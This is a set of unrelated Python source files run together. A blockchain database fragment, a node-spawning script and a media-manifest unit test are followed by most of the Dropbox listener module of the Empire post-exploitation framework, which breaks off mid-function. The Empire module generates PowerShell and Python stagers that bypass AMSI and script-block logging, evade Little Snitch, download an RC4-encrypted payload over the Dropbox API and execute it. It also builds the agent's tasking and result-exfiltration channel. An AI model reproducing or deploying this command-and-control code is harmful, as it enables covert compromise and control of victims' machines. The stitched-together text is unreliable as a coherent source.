for key, addr in self.address_changes.items():
k = ('address:%s' % key).encode()
(balance, sent, received) = struct.unpack('lll', self.db.get(k, struct.pack('lll', 0, 0, 0)))
addressBatch.put(k, struct.pack('lll',
balance + addr['balance'],
sent + addr['sent'],
received + addr['received'],
))
self.address_change_count += 1
self.address_changes = {}
def connect_block(self, ser_hash, block, blkmeta):
# update database pointers for best chain
with self.db.write_batch(transaction=True) as wb:
wb.put(b'misc:total_work', int_to_bytes(blkmeta.work))
wb.put(b'misc:height', struct.pack('i', blkmeta.height))
wb.put(b'misc:tophash', lx(ser_hash))
self.log.info("ChainDb: height %d, block %s" % (blkmeta.height, b2lx(block.GetHash())))
bHash = b2lx(block.GetHash())
dt = datetime.utcfromtimestamp(block.nTime)
# self.db_sync()
if dt > datetime.utcnow() - timedelta(minutes=10) and self.initial_sync:
self.log.info('Chain has caught up')
self.initial_sync = False
self.db_sync()
height = blkmeta.height
timestamp = dt.timestamp()
wb.put(('pg_block:%s' % bHash).encode(), json.dumps({
'merkle_root': b2lx(block.hashMerkleRoot), # save merkle root as hex string
                'difficulty': block.calc_difficulty(block.nBits),  # difficulty derived from nBits (raw bits stored separately below)
                'timestamp': timestamp,
                'version': block.nVersion,  # saved as binary downstream so binary operations are possible
'height': height,
'bits': block.nBits,
'nonce': block.nNonce,
'chainwork': blkmeta.work,
'size': len(block.serialize()),
'hash': bHash,
'coinbase': base64.encodebytes(block.vtx[0].vin[0].scriptSig).decode(),
'tx_count': len(block.vtx),
'tx': list(map(lambda tx : b2lx(tx.GetTxid()), block.vtx))
}).encode())
self.parse_vtx(block.vtx, wb, timestamp, block.GetHash(), height)
self._update_address_index()
self.checktransactions()
self.checkaddresses()
self.checkblocks(height)
self.checkutxos()
for key, value in self.utxo_cache.items():
wb.put(key, value)
self.utxo_cache = {}
return dt
def putblock(self, block):
with self.block_lock:
if self.haveblock(block.GetHash(), False):
self.log.info("Duplicate block %s submitted" % (b2lx(block.GetHash()), ))
return False
return self.putoneblock(block)
def puttxidx(self, txhash, txidx, spend=False, batch=None):
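        """Store the transaction index entry as b'tx:<txid>' -> b'<blkhash> <spentmask>',
        warning when a non-spend overwrite of an existing entry occurs."""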
ser_txhash = int(txhash, 16)
self.db.get(('tx:'+txhash).encode())
old_txidx = self.gettxidx(txhash)
if old_txidx and not spend:
self.log.warn("overwriting duplicate TX %064x, height %d, oldblk %s, oldspent %x, newblk %s newspent %x" % (ser_txhash, 0, old_txidx.blkhash, old_txidx.spentmask, txidx.blkhash, txidx.spentmask))
        batch = self.db if batch is None else batch
value = (txidx.blkhash + ' ' + str(txidx.spentmask)).encode()
batch.put(('tx:' + txhash).encode(), value)
return True
def gettxidx(self, txhash):
ser_value = self.db.get(('tx:'+txhash).encode())
if not ser_value:
return None
ser_value = ser_value.decode('utf-8')
pos = ser_value.find(' ')
txidx = TxIdx(ser_value[:pos])
        # spentmask is written by puttxidx() as a decimal string after the block hash
        txidx.spentmask = int(ser_value[pos + 1:])
return txidx
def getblock(self, blkhash) -> CBlock:
# block = self.blk_cache.get(blkhash)
# if block is not None:
# return block
ser_hash = b2lx(blkhash)
try:
# Lookup the block index, seek in the file
fpos = self.db.get(('blocks:'+ser_hash).encode())
fpos = struct.unpack('i', fpos)[0]
self.blk_read.seek(fpos)
# read and decode "block" msg
msg = MsgSerializable.stream_deserialize(self.blk_read)
if msg is None:
return None
block = msg.block
except KeyError:
return None
# self.blk_cache.put(blkhash, block)
return block
def spend_txout(self, txhash, n_idx, batch=None):
txidx = self.gettxidx(txhash)
if txidx is None:
return False
txidx.spentmask |= (1 << n_idx)
self.puttxidx(txhash, txidx, spend=True, batch=batch)
return True
def txout_spent(self, txout):
txidx = self.gettxidx(b2lx(txout.hash))
if txidx is None:
return None
if txout.n > 100000: # outpoint index sanity check
return None
if txidx.spentmask & (1 << txout.n):
return True
return False
def tx_is_orphan(self, tx):
for txin in tx.vin:
rc = self.txout_spent(txin.prevout)
if rc is None: # not found: orphan
try:
txfrom = self.mempool.pool[b2lx(txin.prevout.hash)]
except:
return True
if txin.prevout.n >= len(txfrom.vout):
return None
if rc is True: # spent? strange
return None
return False
|
nest.py
|
#!/usr/bin/python3
import subprocess
import sys
import signal
import time
import threading
import socket
from xmlrpc.server import SimpleXMLRPCServer
from node import Node
import socketserver
class ThreadedXMLRPCServer(socketserver.ThreadingMixIn, SimpleXMLRPCServer):
pass
# GET IP ADDRESS AND PORT
def get_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
PORT = s.getsockname()[1]
except:
IP = '127.0.0.1'
PORT = 6969
finally:
s.close()
return IP, PORT
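# Note: connecting a UDP socket sends no packets; it only makes the OS pick an outbound
# interface and an ephemeral source port for that destination, which is why getsockname()
# yields a usable local IP even though 10.255.255.255 is never actually reached.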
from pathlib import Path
def fresh_start():
for p in Path("./db/").glob("*.db"):
p.unlink()
for p in Path("./db/").glob("*.db-journal"):
p.unlink()
def spawn_node():
ADDRESS, PORT = get_address()
# start XML-RPC server
server = ThreadedXMLRPCServer((ADDRESS, int(PORT)), use_builtin_types=True, allow_none=True)
server.register_instance(Node(ADDRESS, PORT, TRACKER_ADDRESS))
print('-- Node running on ' + ADDRESS + ':' + str(PORT))
server.serve_forever()
fresh_start()
# params
n = int(sys.argv[1])
TRACKER_ADDRESS = sys.argv[2]
# container for processes
threads = []
for i in range(n):
t = threading.Thread(target=spawn_node, args=())
threads.append(t)
t.start()
print('Nest running...')
|
test_MParser.py
|
from unittest import TestCase
from manifestparser import MParser
import http.server
import socketserver
from threading import Thread
class TestMParser(TestCase):
_httpd = None
_httpdthread = None
_port = 8000
@classmethod
def setUpClass(cls):
handler = http.server.SimpleHTTPRequestHandler
cls._httpd = socketserver.TCPServer(("127.0.0.1", cls._port), handler)
cls._httpdthread = Thread(target=cls._httpd.serve_forever)
cls._httpdthread.start()
@classmethod
def tearDownClass(cls):
cls._httpd.shutdown()
cls._httpdthread.join()
def setUp(self):
self.hssvod = MParser("http://127.0.0.1:%d/testdata/To_The_Limit_720.ism_Manifest" % self._port)
self.dashvod = MParser(
"http://127.0.0.1:%s/testdata/Jezebels_Reich-Main_Movie-9221571562371948872_v1_deu_20_1080k-HEVC-SD_HD_HEVC_DASH.mpd_streamProfile_Dash-NoText" % self._port)
def test_hss(self):
self.assertTrue(self.hssvod.hss)
self.assertFalse(self.dashvod.hss)
def test_dash(self):
self.assertTrue(self.dashvod.dash)
self.assertFalse(self.hssvod.dash)
def test_vod(self):
self.assertTrue(self.hssvod.vod)
# self.assertTrue(self.dashvod.vod)
def test_live(self):
self.assertFalse(self.hssvod.live)
# self.assertFalse(self.dashvod.live)
def test_bitrates(self):
self.assertListEqual(self.hssvod.bitrates(MParser.VIDEO),
[2962000, 2056000, 1427000, 991000, 688000, 477000, 331000, 230000])
self.assertListEqual(self.hssvod.bitrates(MParser.AUDIO), [128000])
self.assertListEqual(self.dashvod.bitrates(MParser.VIDEO),
[150363, 409396, 756951, 1046799, 2119631, 4111492, 5472034])
self.assertListEqual(self.dashvod.bitrates(MParser.AUDIO), [128000])
def test_fragments(self):
values = list(self.hssvod.fragments(MParser.VIDEO, max, 30))
self.assertEqual(len(values), 15)
# values = list(self.dashvod.fragments(MParser.VIDEO, max, 30))
# self.assertEqual(len(values), 10)
|
dbx.py
|
import base64
import random
import os
import time
import copy
import json
import dropbox
# from dropbox.exceptions import ApiError, AuthError
# from dropbox.files import FileMetadata, FolderMetadata, CreateFolderError
from pydispatch import dispatcher
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Dropbox',
'Author': ['@harmj0y'],
'Description': ('Starts a Dropbox listener.'),
'Category' : ('third_party'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'dropbox'
},
'APIToken' : {
'Description' : 'Authorization token for Dropbox API communication.',
'Required' : True,
'Value' : ''
},
'PollInterval' : {
'Description' : 'Polling interval (in seconds) to communicate with the Dropbox Server.',
'Required' : True,
'Value' : '5'
},
'BaseFolder' : {
'Description' : 'The base Dropbox folder to use for comms.',
'Required' : True,
'Value' : '/Empire/'
},
'StagingFolder' : {
'Description' : 'The nested Dropbox staging folder.',
'Required' : True,
'Value' : '/staging/'
},
'TaskingsFolder' : {
'Description' : 'The nested Dropbox taskings folder.',
'Required' : True,
'Value' : '/taskings/'
},
'ResultsFolder' : {
'Description' : 'The nested Dropbox results folder.',
'Required' : True,
'Value' : '/results/'
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 60
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 10
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/dbx generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
# host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language.startswith('po'):
# PowerShell
# replace with stager = '' for troubleshooting
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.Ams'+'iUtils'"
stager += helpers.randomize_capitalization(');$Ref.GetField(')
stager += "'am'+'siInitFailed','NonPu'+'blic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+"=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;"
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# add in the Dropbox auth token and API params
stager += "$t='%s';" % (apiToken)
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Authorization\",\"Bearer $t\");"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Dropbox-API-Arg\",'{\"path\":\"%s/debugps\"}');" % (stagingFolder)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData('")
stager += "https://content.dropboxapi.com/2/files/download');"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
elif language.startswith('py'):
launcherBase = 'import sys;'
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "t='%s';" % (apiToken)
launcherBase += "server='https://content.dropboxapi.com/2/files/download';"
launcherBase += "req=urllib2.Request(server);\n"
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header(\"Authorization\",\"Bearer \"+t);"
launcherBase += "req.add_header(\"Dropbox-API-Arg\",'{\"path\":\"%s/debugpy\"}');\n" % (stagingFolder)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/dbx generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/dbx generate_stager(): no language specified!')
return None
pollInterval = listenerOptions['PollInterval']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
apiToken = listenerOptions['APIToken']['Value']
profile = listenerOptions['DefaultProfile']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/dropbox.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# patch the server and key information
stager = stager.replace('REPLACE_STAGING_FOLDER', stagingFolder)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('REPLACE_POLLING_INTERVAL', pollInterval)
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('dropbox.py')
template_options = {
'staging_folder': stagingFolder,
'poll_interval': pollInterval,
'staging_key': stagingKey,
'profile': profile,
'api_token': apiToken
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/dbx generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
#strip out comments and blank lines
code = helpers.strip_python_comments(code)
#patch some more
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print helpers.color("[!] listeners/dbx generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:APIToken = "%s";
""" % (apiToken)
getTask = """
$script:GetTask = {
try {
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent", $script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$TaskingsFolder = "%s"
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
if($Data -and ($Data.Length -ne 0)) {
# if there was a tasking data, remove it
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Content-Type", " application/json")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Remove("Dropbox-API-Arg")
$Null=$"""+helpers.generate_random_script_var_name("wc")+""".UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data
}
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
""" % (taskingsFolder)
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$ResultsFolder = "%s"
try {
# check if the results file is still in the specified location, if so then
# download the file and append the new routing packet to it
try {
$Data = $Null
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)");
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
}
catch { }
if($Data -and $Data.Length -ne 0) {
$RoutingPacket = $Data + $RoutingPacket
}
$"""+helpers.generate_random_script_var_name("wc")+"""2 = New-Object System.Net.WebClient
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = $Script:Proxy;
}
